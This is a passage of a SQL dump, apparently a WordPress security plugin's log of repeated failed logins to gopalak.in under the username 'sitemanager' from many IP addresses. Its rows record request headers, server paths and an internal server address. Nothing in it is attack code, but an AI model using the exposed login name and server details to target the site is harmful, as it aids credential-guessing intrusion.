D\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746069578.415694;s:12:\"REQUEST_TIME\";i:1746069578;}}','20.198.224.111',0,'2025-05-01 08:49:40','1970-01-01 00:00:00'),(94772,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46224\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.229.229\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746069913.355206;s:12:\"REQUEST_TIME\";i:1746069913;}}','162.0.229.229',0,'2025-05-01 08:55:15','1970-01-01 00:00:00'),(94773,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42072\";s:11:\"REMOTE_ADDR\";s:13:\"157.245.6.207\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746070246.257179;s:12:\"REQUEST_TIME\";i:1746070246;}}','157.245.6.207',0,'2025-05-01 09:00:47','1970-01-01 00:00:00'),(94774,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34430\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.209.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746070582.6517839;s:12:\"REQUEST_TIME\";i:1746070582;}}','162.0.209.248',0,'2025-05-01 09:06:24','1970-01-01 00:00:00'),(94775,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41692\";s:11:\"REMOTE_ADDR\";s:12:\"209.172.2.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746070912.7193601;s:12:\"REQUEST_TIME\";i:1746070912;}}','209.172.2.50',0,'2025-05-01 09:11:54','1970-01-01 00:00:00'),(94776,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40384\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.209.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746071248.803066;s:12:\"REQUEST_TIME\";i:1746071248;}}','162.0.209.248',0,'2025-05-01 09:17:30','1970-01-01 00:00:00'),(94777,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51186\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.191\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746071584.3567131;s:12:\"REQUEST_TIME\";i:1746071584;}}','199.188.200.191',0,'2025-05-01 09:23:06','1970-01-01 00:00:00'),(94778,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41608\";s:11:\"REMOTE_ADDR\";s:15:\"186.209.113.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746071919.4289479;s:12:\"REQUEST_TIME\";i:1746071919;}}','186.209.113.104',0,'2025-05-01 09:28:41','1970-01-01 00:00:00'),(94779,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57928\";s:11:\"REMOTE_ADDR\";s:15:\"161.248.201.171\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746072262.6677461;s:12:\"REQUEST_TIME\";i:1746072262;}}','161.248.201.171',0,'2025-05-01 09:34:24','1970-01-01 00:00:00'),(94780,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42958\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.123.38\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746072591.3418469;s:12:\"REQUEST_TIME\";i:1746072591;}}','68.65.123.38',0,'2025-05-01 09:39:53','1970-01-01 00:00:00'),(94781,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34456\";s:11:\"REMOTE_ADDR\";s:12:\"51.178.45.73\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746072931.229835;s:12:\"REQUEST_TIME\";i:1746072931;}}','51.178.45.73',0,'2025-05-01 09:45:33','1970-01-01 00:00:00'),(94782,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 